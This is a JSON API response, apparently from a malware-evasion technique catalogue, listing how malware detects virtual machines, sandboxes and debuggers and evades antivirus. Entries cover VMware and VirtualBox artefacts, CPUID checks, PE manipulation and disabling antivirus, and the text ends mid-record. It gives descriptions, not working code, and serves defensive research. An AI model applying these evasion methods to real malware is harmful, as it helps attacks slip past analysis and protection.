HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept
[
{
"id": 6,
"key": "detecting-active-services",
"unprotect_id": "U1337",
"name": "Detecting Active Services",
"description": "VMwareService.exe runs the VMware Tools Service as a child of services.exe. It can be identified by listing services.",
"resources": "",
"creation_date": "2019-03-11T07:54:25Z",
"tags": "",
"modification_date": "2023-10-04T10:37:28.470000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
321,
331,
381
],
"contributors": []
},
{
"id": 7,
"key": "querying-the-io-communication-port",
"unprotect_id": "U1336,B0009.025",
"name": "Querying the I/O Communication Port",
"description": "VMware uses virtual I/O ports for communication between the virtual machine and the host operating system to support functionality like copy and paste between the two systems. The port can be queried and compared with a magic number VMXh to identify the use of VMware.",
"resources": "https://www.aldeid.com/wiki/VMXh-Magic-Value",
"creation_date": "2019-03-11T07:55:13Z",
"tags": "",
"modification_date": "2023-10-04T10:42:03.259000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 8,
"key": "detecting-mac-address",
"unprotect_id": "U1335,B0009.028",
"name": "Detecting Mac Address",
"description": "Virtualbox and VMware use specific virtual Mac address that can be detected by Malware.\r\n\r\n* The usual mac address used by Virtualbox starts with the following number: 08:00:27.\r\n* The usual mac address used by VMware starts with the following numbers: 00:0C:29, 00:1C:14, 00:50:56, 00:05:69.\r\n\r\nMalware can use this simple trick to detect if it is running in a virtual environment and decide to not run properly.",
"resources": "https://securingtomorrow.mcafee.com/mcafee-labs/overview-malware-self-defense-protection/",
"creation_date": "2019-03-11T07:56:04Z",
"tags": "",
"modification_date": "2023-10-04T10:42:05.695000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 10,
"key": "detecting-virtual-environment-process",
"unprotect_id": "U1334,B0009.004",
"name": "Detecting Virtual Environment Process",
"description": "Process related to Virtualbox can be detected by malware by query the process list.\r\n\r\nThe VMware Tools use processes like VMwareServices.exe or VMwareTray.exe, to perform actions on the virtual environment. A malware can list the process and searches for the VMware string. Process: VMwareService.exe, VMwareTray.exe, TPAutoConnSvc.exe, VMtoolsd.exe, VMwareuser.exe.",
"resources": "https://securingtomorrow.mcafee.com/mcafee-labs/stopping-malware-fake-virtual-machine/",
"creation_date": "2019-03-11T07:57:29Z",
"tags": "",
"modification_date": "2023-10-04T10:43:08.365000Z",
"category": [
1
],
"rules": [
17
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 11,
"key": "detecting-virtual-environment-files",
"unprotect_id": "U1333",
"name": "Detecting Virtual Environment Files",
"description": "Some files are created by Virtualbox and VMware on the system. \r\n\r\nMalware can check the different folders to find Virtualbox artifacts like VBoxMouse.sys.\r\n\r\nMalware can check the different folders to find VMware artifacts like vmmouse.sys, vmhgfs.sys.\r\n\r\n### Some Files Example\r\nBelow is a list of files that can be detected on virtual machines:\r\n\r\n- \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\agent.pyw\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vmmouse.sys\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vmhgfs.sys\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxMouse.sys\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxGuest.sys\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxSF.sys\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxVideo.sys\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxdisp.dll\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxhook.dll\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxmrxnp.dll\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxogl.dll\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxoglarrayspu.dll\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxoglcrutil.dll\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxoglerrorspu.dll\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxoglfeedbackspu.dll\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxoglpassthroughspu.dll\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxservice.exe\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\vboxtray.exe\",\r\n- \"C:\\\\WINDOWS\\\\system32\\\\VBoxControl.exe\"",
"resources": "https://securingtomorrow.mcafee.com/mcafee-labs/stopping-malware-fake-virtual-machine/",
"creation_date": "2019-03-11T07:58:16Z",
"tags": "",
"modification_date": "2023-10-04T10:44:52.297000Z",
"category": [
1
],
"rules": [
31,
41
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 12,
"key": "detecting-virtual-environment-artefacts",
"unprotect_id": "U1332",
"name": "Detecting Virtual Environment Artefacts",
"description": "Qemu registers some artifacts into the registry. A malware can detect the Qemu installation with a look at the registry key `HARDWARE\\\\DEVICEMAP\\\\Scsi\\\\Scsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\\Logical Unit Id 0` with the value of `Identifier` and the data of `QEMU` or `HARDWARE\\\\Description\\\\System` with a value of `SystemBiosVersion` and data of `QEMU`.\r\n\r\nThe VirtualBox Guest addition leaves many artifacts in the registry. A search for `VBOX` in the registry might find some keys.\r\n\r\nThe VMware installation directory `C:\\\\Program Files\\\\VMware\\\\VMware Tools` may also contain artifacts, as can the registry. A search for VMware in the registry might find some keys that include information about the virtual hard drive, adapters, and virtual mouse.\r\n\r\nVMware leaves many artefacts in memory. Some are critical processor structures, which, because they are either moved or changed on a virtual machine, leave recognisable footprints. Malware can search through physical memory for the strings VMware, commonly used to detect memory artifacts.",
"resources": "https://www.slideshare.net/ThomasRoccia/sandbox-evasion-cheat-sheet",
"creation_date": "2019-03-11T07:58:47Z",
"tags": "",
"modification_date": "2023-10-04T10:43:32.985000Z",
"category": [
1
],
"rules": [
17,
19,
32,
53
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 13,
"key": "checking-specific-folder-name",
"unprotect_id": "U1331",
"name": "Checking Specific Folder Name",
"description": "Specific directories, such as \"C:\\Cuckoo\", can serve as indicators of a sandboxed or virtualized environment when present on a guest system. Consequently, a savvy piece of malware could potentially use the detection of this particular directory as a means of evading analysis. This would allow the malicious software to alter its behavior or even halt its execution altogether when it identifies such markers, thus skirting the sandbox and avoiding detection.",
"resources": "https://www.slideshare.net/ThomasRoccia/sandbox-evasion-cheat-sheet",
"creation_date": "2019-03-11T07:59:28Z",
"tags": "Special path, Cuckoo, Guest system, Malware, Sandbox evasion",
"modification_date": "2023-10-04T10:42:06.572000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
23,
381
],
"contributors": []
},
{
"id": 14,
"key": "detecting-hooked-function",
"unprotect_id": "U1330",
"name": "Detecting Hooked Function",
"description": "To avoid some actions on the system by the malware like deleted a file. Cuckoo will hook some function and performs another action instead of the original one. For example the function DeleteFileW could be hooked to avoid file deletion.",
"resources": "https://www.slideshare.net/ThomasRoccia/sandbox-evasion-cheat-sheet",
"creation_date": "2019-03-11T08:00:27Z",
"tags": "",
"modification_date": "2023-10-04T10:42:07.527000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 15,
"key": "checking-pipe",
"unprotect_id": "U1329",
"name": "Checking Pipe",
"description": "Cuckoo is a malware analysis system that uses a named pipe, called \\\\.\\pipe\\cuckoo, for communication between the host system (where the malware is being analyzed) and the guest system (where the malware is running). \r\n\r\nA malware that is running on the guest system can detect the presence of a virtual environment by attempting to access the \\\\.\\pipe\\cuckoo named pipe. If the named pipe exists, it indicates that the malware is running on a virtual machine being monitored by Cuckoo. This information can be used by the malware to adjust its behavior in order to evade detection or to avoid performing certain actions.",
"resources": "https://www.slideshare.net/ThomasRoccia/sandbox-evasion-cheat-sheet",
"creation_date": "2019-03-11T08:01:31Z",
"tags": "Sandbox,\r\nCuckoo,\r\nHost system,\r\nGuest system,\r\nCommunication,\r\nNamed pipe,\r\nVirtual environment,",
"modification_date": "2023-10-04T10:42:28.443000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 17,
"key": "sidt-red-pill",
"unprotect_id": "U1328,B0009.030",
"name": "SIDT, Red Pill",
"description": "Red Pill is a technique used by malware to determine whether it is running on a physical machine or a virtual machine. The Red Pill technique involves executing the SIDT instruction, which retrieves the value of the Interrupt Descriptor Table Register (IDTR) and stores it in a memory location. \r\n\r\nOn a physical machine, the IDTR will contain the address of the Interrupt Descriptor Table (IDT), which is a data structure used by the operating system to manage interrupts. However, on a virtual machine, the IDTR will contain the address of the IDT for the virtual machine, which is different from the IDT for the host machine. \r\n\r\nBy comparing the IDTR on a physical and a virtual machine, malware can determine whether it is running on a physical or a virtual machine. This information can be used by the malware to adjust its behavior accordingly.",
"resources": "https://litigationconferences.com/wp-content/uploads/2017/05/Introduction-to-Evasive-Techniques-v1.0.pdf",
"creation_date": "2019-03-11T08:03:01Z",
"tags": "Anti-VM technique,\r\nSIDT instruction,\r\nIDTR register,\r\nIDT,\r\nInterrupts,\r\nVirtual machine,\r\nInterrupt Descriptor Table (IDT),",
"modification_date": "2023-10-04T10:44:01.802000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 18,
"key": "sldt-no-pill",
"unprotect_id": "U1327,B0009.031",
"name": "SLDT, No Pill",
"description": "The No Pill technique is a method used by malware to determine whether it is running on a physical machine or a virtual machine. This technique relies on the fact that the Local Descriptor Table (LDT) is assigned to a processor, rather than to an operating system. On a physical machine, the location of the LDT will be zero, whereas on a virtual machine, the location of the LDT will be non-zero. \r\n\r\nBy checking the location of the LDT, malware can determine whether it is running on a physical or a virtual machine. This information can be used by the malware to adjust its behavior accordingly. For example, the malware may choose to remain dormant on a virtual machine in order to avoid detection.",
"resources": "https://blog.talosintelligence.com/2009/10/how-does-malware-know-difference.html",
"creation_date": "2019-03-11T08:04:03Z",
"tags": "Physical machine,\r\nVirtual machine,\r\nLocal Descriptor Table (LDT),\r\nProcessor,\r\nOperating system,",
"modification_date": "2023-10-04T10:44:37.533000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 19,
"key": "smsw",
"unprotect_id": "U1326,B0009.032",
"name": "SMSW",
"description": "Stores the machine status word into the destination operand.",
"resources": "https://sites.google.com/site/bletchleypark2/malware-analysis/malware-technique/anti-vm",
"creation_date": "2019-03-11T08:05:02Z",
"tags": "",
"modification_date": "2023-10-04T10:42:02.944000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 20,
"key": "str",
"unprotect_id": "U1325,B0009.033",
"name": "STR",
"description": "Stores the segment selector from the Task Register (TR).",
"resources": "https://sites.google.com/site/bletchleypark2/malware-analysis/malware-technique/anti-vm",
"creation_date": "2019-03-11T08:05:47Z",
"tags": "",
"modification_date": "2023-10-04T10:42:01.226000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 21,
"key": "cpuid",
"unprotect_id": "U1324,B0009.034",
"name": "CPUID",
"description": "The CPUID instruction is a low-level command that allows you to retrieve information about the CPU that is currently running. This instruction, which is executed at the CPU level (using the bytecode 0FA2), is available on all processors that are based on the Pentium architecture or newer.\r\n\r\nYou can use the CPUID instruction to retrieve various pieces of information about the CPU, such as the brand of the CPU, the operating system, or the presence of a hypervisor. This is done by specifying the \"leaf\" information you want to retrieve (such as 0 for the brand of the CPU) in the EAX register, and then executing the instruction. The result will be returned in the EBX, EDX, and ECX registers as a string.\r\n\r\nFor example, when you request leaf information 0, you may see the brand of the CPU or the virtualization technology in use. Some common strings that you may see include \"KVMKVMKVM\" for KVM, \"Microsoft Hv\" for Hyper-V, \"VMwareVMware\" for VMware, and \"GenuineIntel\" for an Intel CPU.\r\n\r\nThe information returned by the CPUID instruction can vary depending on the platform and the specific CPU model.",
"resources": "https://sites.google.com/site/bletchleypark2/malware-analysis/malware-technique/anti-vm\nhttps://github.com/a0rtega/pafish",
"creation_date": "2019-03-11T08:06:29Z",
"tags": "CPUID, instruction, CPU level, bytecode 0FA2, running CPU, Pentium, brand of the CPU, Hypervisor, leaf information, EAX register, EBX, EDX, ECX, virtualisation, plateforms, KVM, Microsoft Hv, Hyper V, VMware, GenuineIntel",
"modification_date": "2023-10-04T10:43:32.768000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
339
],
"contributors": []
},
{
"id": 22,
"key": "in",
"unprotect_id": "U1323,B0009.035",
"name": "IN",
"description": "The IN instruction is a type of machine code instruction that is used to read data from an input port. This instruction can only be executed in privileged mode, such as in kernel mode, and an attempt to execute it in user mode will generate an exception. \r\n\r\nHowever, some virtual machine monitors, such as VMWare, use a special port called the VX port as an interface between the virtual machine monitor (VMM) and the virtual machine. If a malware executes the IN instruction in user mode on a VMWare virtual machine, it will not generate an exception, since the VX port allows the instruction to be executed without triggering an exception. This behavior can be used by the malware to detect the presence of a VMWare virtual machine.",
"resources": "https://sites.google.com/site/bletchleypark2/malware-analysis/malware-technique/anti-vm",
"creation_date": "2019-03-11T08:07:40Z",
"tags": "Machine code instruction,\r\nInput port,\r\nVirtual machine monitor (VMM),\r\nVirtual machine,\r\nVMWare,\r\nVX port,",
"modification_date": "2023-10-04T10:42:31.362000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 24,
"key": "vmcpuid",
"unprotect_id": "U1322,B0009.037",
"name": "VMCPUID",
"description": "The VMCPUID instruction is a sophisticated mechanism often employed by malware to ascertain if it is operating within a virtual environment.\r\n\r\nThis instruction is part of the x86 architecture's virtual machine extensions (VMX) and is designed to provide information about the capabilities and status of the virtual machine. \r\n\r\nBy using VMCPUID, malware can adapt its behavior based on the context in which it is running, thus adding an additional layer of complexity to its detection and mitigation. Essentially, it serves as a telltale indicator, aiding malware in identifying virtualization-based security measures or sandboxing environments",
"resources": "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/",
"creation_date": "2019-03-11T08:09:24Z",
"tags": "VMCPUID, instruction, malware, detection, virtual environment, x86 architecture",
"modification_date": "2023-10-04T10:42:06.356000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 25,
"key": "vpcext",
"unprotect_id": "U1321,B0009.038",
"name": "VPCEXT",
"description": "The VPCEXT instruction (visual property container extender) is another anti–virtual machine trick used by malware to detect virtual systems. This technique is not documented. If the execution of the instruction does not generate an exception (illegal instruction), then the program is running on a virtual machine.",
"resources": "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/\nhttps://shasaurabh.blogspot.com/2017/07/virtual-machine-detection-techniques.html\nhttps://www.codeproject.com/Articles/9823/Detect-if-your-program-is-running-inside-a-Virtual",
"creation_date": "2019-03-11T08:10:11Z",
"tags": "",
"modification_date": "2023-10-04T10:42:40.076000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 26,
"key": "onset-delay",
"unprotect_id": "U1320",
"name": "Onset Delay",
"description": "Malware will delay execution to avoid analysis by the sample. For example, a Ping can be perform during a time defined. Unlike extended sleep that will use the Sleep function, onset delay will use another way to delay execution.\r\n\r\nThe purpose of such evasive code is to delay the execution of malicious activity long enough so that automated analysis systems give up on a sample, incorrectly assuming that the program is non-functional, or does not execute any action of interest.",
"resources": "http://www.syssec-project.eu/m/page-media/3/hasten-ccs11.pdf\nhttps://blog.sonicwall.com/2018/02/6-ways-malware-evades-detection/",
"creation_date": "2019-03-11T08:11:04Z",
"tags": "",
"modification_date": "2023-10-04T10:42:38.381000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 28,
"key": "stalling-code",
"unprotect_id": "U1318,B0003.003",
"name": "Stalling Code",
"description": "This technique is used for delaying execution of the real malicious code. Stalling code is typically executed before any malicious behavior. The attacker’s aim is to delay the execution of the malicious activity long enough so that an automated dynamic analysis system fails to extract the interesting malicious behavior.",
"resources": "https://www.sans.org/reading-room/whitepapers/malicious/sleeping-sandbox-35797",
"creation_date": "2019-03-11T08:12:32Z",
"tags": "",
"modification_date": "2023-10-04T10:42:14.290000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 29,
"key": "checking-mouse-activity",
"unprotect_id": "U1317,B0007.003",
"name": "Checking Mouse Activity",
"description": "Some Sandbox doesn't have the mouse moving or a fun wallpaper, malware can detect if there is any activities into the sandbox.",
"resources": "",
"creation_date": "2019-03-11T08:13:32Z",
"tags": "",
"modification_date": "2023-10-04T10:37:44.543000Z",
"category": [
1
],
"rules": [
22
],
"attachments": [],
"featured_api": [
25,
94,
185,
192
],
"contributors": []
},
{
"id": 30,
"key": "checking-recent-office-files",
"unprotect_id": "U1316,B0007.003",
"name": "Checking Recent Office Files",
"description": "Another way to detect if the malware is running in a real user machine is to check if some recent Office files was opened.",
"resources": "https://www.zscaler.com/blogs/research/malicious-documents-leveraging-new-anti-vm-anti-sandbox-techniques",
"creation_date": "2019-03-11T08:14:05Z",
"tags": "",
"modification_date": "2023-10-04T10:42:09.710000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 31,
"key": "checking-screen-resolution",
"unprotect_id": "U1315,B0007.006",
"name": "Checking Screen Resolution",
"description": "Sandbox environments typically do not function as standard user workspaces; as a result, they often maintain a minimum screen resolution of 800x600 or even lower. In practice, users seldom work with such limited screen dimensions. Malware may leverage this information, detecting the screen resolution to ascertain whether it is operating on a genuine user machine or within a sandbox environment.",
"resources": "https://www.botconf.eu/2015/sandbox-detection-for-the-masses-leak-abuse-test/",
"creation_date": "2019-03-11T08:14:42Z",
"tags": "sandbox environments, standard user workspaces, screen resolution, 800x600, malware detection, user machine",
"modification_date": "2023-10-04T10:44:00.339000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
25,
183,
224,
290,
291
],
"contributors": []
},
{
"id": 32,
"key": "checking-installed-software",
"unprotect_id": "U1314",
"name": "Checking Installed Software",
"description": "By detecting the presence of certain software and tools commonly used in sandbox environments, such as Python interpreters, tracing utilities, debugging tools, and virtual machine software like VMware, it is possible to infer the existence of a sandbox. \r\n\r\nThis inference is based on the premise that such tools are often found in sandbox setups used for dynamic malware analysis but are less common in regular user environments.",
"resources": "https://www.theguardian.com/technology/blog/2011/nov/08/sandboxing-malware-failure\r\nhttps://evasions.checkpoint.com/techniques/human-like-behavior.html",
"creation_date": "2019-03-11T08:15:36Z",
"tags": "installed software, sandbox",
"modification_date": "2024-01-16T04:21:02.068000Z",
"category": [
1
],
"rules": [
153
],
"attachments": [],
"featured_api": [
315,
321,
328,
331
],
"contributors": [
33
]
},
{
"id": 33,
"key": "checking-memory-size",
"unprotect_id": "U1313, B0009.014",
"name": "Checking Memory Size",
"description": "Most modern user machines have at least 4GB of memory. Malware programs can detect whether they are running in a sandbox environment by checking the available memory size. If the available memory size is less than 4GB, it is likely that the program is running in a sandbox.",
"resources": "https://www.botconf.eu/2015/sandbox-detection-for-the-masses-leak-abuse-test/",
"creation_date": "2019-03-11T08:16:13Z",
"tags": "memory, malware, sandbox, available memory size.",
"modification_date": "2023-10-04T10:42:09.947000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
597
],
"contributors": []
},
{
"id": 34,
"key": "checking-hard-drive-size",
"unprotect_id": "U1312, B0009.015",
"name": "Checking Hard Drive Size",
"description": "Many user machines have hard drives that are larger than 80GB. A malware program can detect whether it is running in a virtual environment by checking the size of the hard drive. If the size is less than 80GB, it is likely that the program is running in a sandbox or virtual environment.",
"resources": "https://www.botconf.eu/2015/sandbox-detection-for-the-masses-leak-abuse-test/",
"creation_date": "2019-03-11T08:16:57Z",
"tags": "user machines, hard drives, size, 80GB, malware, virtual environment, sandbox",
"modification_date": "2023-10-04T10:42:21.219000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
596
],
"contributors": []
},
{
"id": 35,
"key": "detecting-hostname-username",
"unprotect_id": "U1311",
"name": "Detecting Hostname, Username",
"description": "Most sandbox are using name like Sandbox, Cuckoo, Maltest, Malware, malsand, ClonePC.... All this hostname can provide the information to the malware. The username can also be checked by malware.",
"resources": "https://www.first.org/resources/papers/conf2017/Countering-Innovative-Sandbox-Evasion-Techniques-Used-by-Malware.pdf",
"creation_date": "2019-03-11T08:17:31Z",
"tags": "",
"modification_date": "2023-10-04T10:42:08.932000Z",
"category": [
1
],
"rules": [
57
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 36,
"key": "detecting-usb-drive",
"unprotect_id": "U1310, B0009.016",
"name": "Detecting USB Drive",
"description": "To detect whether a program is running in a sandbox environment, malware can look for the presence of USB drives. Many sandboxes do not have USB ports or do not allow access to USB drives, and detecting the absence of USB drives can help identify whether the program is being run in a sandbox.",
"resources": "https://www.first.org/resources/papers/conf2017/Countering-Innovative-Sandbox-Evasion-Techniques-Used-by-Malware.pdf",
"creation_date": "2019-03-11T08:18:05Z",
"tags": "sandbox, program, USB drives,",
"modification_date": "2023-10-04T10:42:11.257000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
594,
595
],
"contributors": []
},
{
"id": 37,
"key": "connected-printer",
"unprotect_id": "U1309, B0009.017",
"name": "Connected Printer",
"description": "Another technique for detecting if a program is running in a sandbox is to look for potential connected printers or identify the default Windows printers, Adobe, or OneNote. This is because sandboxes typically do not have access to printers, and detecting the absence of printers can help identify whether the program is being run in a sandbox environment.",
"resources": "https://www.slideshare.net/bz98/sandbox-detection-leak-abuse-test-hacktivity-2015",
"creation_date": "2019-03-11T08:18:47Z",
"tags": "sandbox, program, printers, connected, default, Windows, Adobe, OneNote, access, environment, detection",
"modification_date": "2023-10-04T10:42:15.569000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
40
],
"contributors": []
},
{
"id": 38,
"key": "evading-hash-signature",
"unprotect_id": "U0516",
"name": "Evading Hash Signature",
"description": "AV are able to detect if it's a known malware by calculating the file hash, by changing a simple bit into the binary can sometimes allow the sample to evade hash detection. This technique is unlikely to work anymore.",
"resources": "https://resources.infosecinstitute.com/antivirus-evasion-tools/",
"creation_date": "2019-03-17T18:07:13Z",
"tags": "",
"modification_date": "2023-10-04T10:42:12.256000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 39,
"key": "evading-specific-signature",
"unprotect_id": "U0515",
"name": "Evading Specific Signature",
"description": "Some signatures are specifically designed to catch an exploit or a specific behaviour. By reversing the signature, it is possible to modify the malware to evade the signature. For example, by changing the size of the payload matching, or by changing the file's header.",
"resources": "https://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit",
"creation_date": "2019-03-18T13:08:26Z",
"tags": "",
"modification_date": "2023-10-04T10:42:11.469000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 40,
"key": "pe-format-manipulation",
"unprotect_id": "U0514",
"name": "PE Format Manipulation",
"description": "Evading signature can also be performed by modifying the PE structure (changing section names, TimeDateStamp, MajorLinkerVersion/MinorLinkerVersion, Major/Minor OperatingSystemVersion and ImageVersion/MinorImageVersion, AddressOfEntryPoint, Maximum number of sections, File length.",
"resources": "https://pentest.blog/art-of-anti-detection-2-pe-backdoor-manufacturing/",
"creation_date": "2019-03-18T13:14:47Z",
"tags": "",
"modification_date": "2023-10-04T10:42:08.566000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 41,
"key": "fingerprinting-emulator",
"unprotect_id": "U0513",
"name": "Fingerprinting Emulator",
"description": "Fingerprinting the AV emulator can allow the malware to detect the AV. For example, specific mutex can be used by the AV emulator, trying to detect it allow the sample to detect the AV.",
"resources": "https://www.blackhat.com/docs/us-16/materials/us-16-Bulazel-AVLeak-Fingerprinting-Antivirus-Emulators-For-Advanced-Malware-Evasion.pdf",
"creation_date": "2019-03-18T13:16:15Z",
"tags": "",
"modification_date": "2023-10-04T10:43:06.521000Z",
"category": [
2
],
"rules": [
58
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 42,
"key": "big-file",
"unprotect_id": "U0512",
"name": "Big File",
"description": "Because of the imposed file size limit, you can trick the scanner into skipping a file by changing the file’s size to make it larger than the hard-coded size limit. This file size limit applies especially with heuristic engines based on static data (data extracted from the portable executable, or PE, header). This is an old trick still apply in the wild.",
"resources": "https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/",
"creation_date": "2019-03-18T13:17:09Z",
"tags": "",
"modification_date": "2023-10-04T10:42:08.210000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 44,
"key": "file-format-confusion",
"unprotect_id": "U0511",
"name": "File Format Confusion",
"description": "By looking the structure of the PE and the content of the file, the engine is able to detect if the file is malicious or not. For example, an heuristic engine can try to figure out if a file are using a dual extension (e.g: invoice.doc.exe) and determine the file as being malicious.\r\n\r\nConfusing file format is another trick that can be used to bypass an AV detection specific to a file format.",
"resources": "https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf\nhttps://code.google.com/archive/p/corkami/wikis/mix.wiki",
"creation_date": "2019-03-18T13:18:47Z",
"tags": "",
"modification_date": "2023-10-04T10:42:12.659000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 45,
"key": "bypassing-static-heuristic",
"unprotect_id": "U0510",
"name": "Bypassing Static Heuristic",
"description": "Dynamic heuristic engines are implemented in the form of hooks (in user-land or kernel-land) or based on emulation. User-land hooks (HIPS) can be easily bypass by malware by patching back the entry point of the hooked function. For kernel-land hook, malware has to run in kernel space by installing a driver or abusing a kernel-level vulnerability.",
"resources": "",
"creation_date": "2019-03-18T13:19:25Z",
"tags": "",
"modification_date": "2023-10-04T10:37:47.211000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 46,
"key": "file-splitting",
"unprotect_id": "U0509",
"name": "File Splitting",
"description": "An old trick consists to split the malicious file into different parts and analyse all of them separately with and AV. The chunk where the detection is still being triggered is actually the part of the file that need to change to evade the antivirus software you are targeting.",
"resources": "https://dl.packetstormsecurity.net/papers/bypass/bypassing-av.pdf",
"creation_date": "2019-03-18T13:20:17Z",
"tags": "",
"modification_date": "2023-10-04T10:42:10.991000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 47,
"key": "disabling-antivirus",
"unprotect_id": "U0508,F0004",
"name": "Disabling Antivirus",
"description": "Some forms of malware are programmed to disable antivirus software and evade detection by security measures. These malicious programs can use specific commands or techniques to undermine the antivirus software's effectiveness and remain hidden from detection..",
"resources": "https://blog.malwarebytes.com/cybercrime/2015/11/vonteera-adware-uses-certificates-to-disable-anti-malware/",
"creation_date": "2019-03-18T13:21:04Z",
"tags": "computer system, network, device, antivirus, evade detection, malicious programs",
"modification_date": "2023-10-04T10:42:10.499000Z",
"category": [
2
],
"rules": [
47
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 48,
"key": "adding-antivirus-exception",
"unprotect_id": "U0507",
"name": "Adding antivirus exception",
"description": "Another way for a malware is to add an exception into the antivirus.",
"resources": "https://www.darknet.org.uk/2016/12/malware-writers-using-exclusion-lists-to-linger/",
"creation_date": "2019-03-18T13:21:38Z",
"tags": "",
"modification_date": "2023-10-04T10:42:18.396000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 49,
"key": "fake-signature",
"unprotect_id": "U0506",
"name": "Fake Signature",
"description": "Every exe file contain metadata that allow users to trust the third party that distribute the program. Malware are able to usurp the metadata in order to fool the user but also the security tools.",
"resources": "",
"creation_date": "2019-03-18T13:22:18Z",
"tags": "",
"modification_date": "2023-10-04T10:37:56.097000Z",
"category": [
2
],
"rules": [
89
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 52,
"key": "isdebuggerpresent",
"unprotect_id": "U0122, B0001.008",
"name": "IsDebuggerPresent",
"description": "This function checks specific flag in the Process Environment Block (PEB) for the field IsDebugged which will return zero if the process is not running into a debugger or a nonzero if a debugger is attached.\r\n\r\nIf you want to understand the underlying process of [IsDebuggerPresent](https://docs.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent) API you can check the code snippet section for the following method: [IsDebugged Flag](https://search.unprotect.it/map/anti-debugging/isdebugged-flag/).",
"resources": "https://msdn.microsoft.com/en-us/library/windows/desktop/ms680345(v=vs.85).aspx",
"creation_date": "2019-03-18T13:24:02Z",
"tags": "isdebuggerpresent",
"modification_date": "2023-10-04T10:43:44.328000Z",
"category": [
3
],
"rules": [
67
],
"attachments": [],
"featured_api": [
360
],
"contributors": []
},
{
"id": 53,
"key": "checkremotedebuggerpresent",
"unprotect_id": "U0121, B0001.002",
"name": "CheckRemoteDebuggerPresent",
"description": "CheckRemoteDebuggerPresent is a kernel32.dll function that sets (-1)0xffffffff in the DebuggerPresent parameter if a debugger is present. Internally, it also uses NtQueryInformationProcess with ProcessDebugPort as a ProcessInformationClass parameter.",
